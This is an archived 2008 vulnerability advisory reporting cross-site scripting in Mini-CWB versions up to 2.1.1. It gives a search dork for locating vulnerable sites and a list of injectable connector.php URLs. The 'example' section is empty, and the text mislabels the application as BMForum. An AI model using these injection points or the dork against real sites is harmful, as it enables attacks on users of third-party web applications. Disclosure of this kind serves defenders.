AOH :: HP Unsorted M :: BX3313.HTM

Mini-CWB <= 2.1.1 Remote XSS Vulnerability



Mini-CWB <= 2.1.1 Remote XSS Vulnerability
Mini-CWB <= 2.1.1 Remote XSS Vulnerability



===========================================================0D
      Mini-CWB <= 2.1.1 Remote XSS Vulnerability             =0D
===========================================================0D
=0D
=0D
AUTHOR : CWH Underground=0D
DATE   : 25 May 2008=0D
SITE : www.citec.us=0D 
=0D
=0D
#####################################################=0D
 APPLICATION : BMForum=0D
 VERSION     : <= 2.1.1 (Lastest Version)=0D
VENDOR : http://www.mini-open-cms.com=0D 
DOWNLOAD : http://www.mini-open-cms.com/download/Mini-CWB-2.1.1.zip=0D 
#####################################################=0D
=0D
DORK: "powered by mini-cwb"=0D
=0D
---Multiple XSS Exploit in 'connector.php'---=0D
=0D
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?errcontext==0D 
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_GET==0D 
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_POST==0D 
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_SESSION==0D 
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?_SERVER==0D 
[-] http://[target]/[mini_cwb_path]/javascript/editor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?fckphp_config[Debug_SERVER]==0D 
=0D
=0D
Example for XSS : =0D
	=0D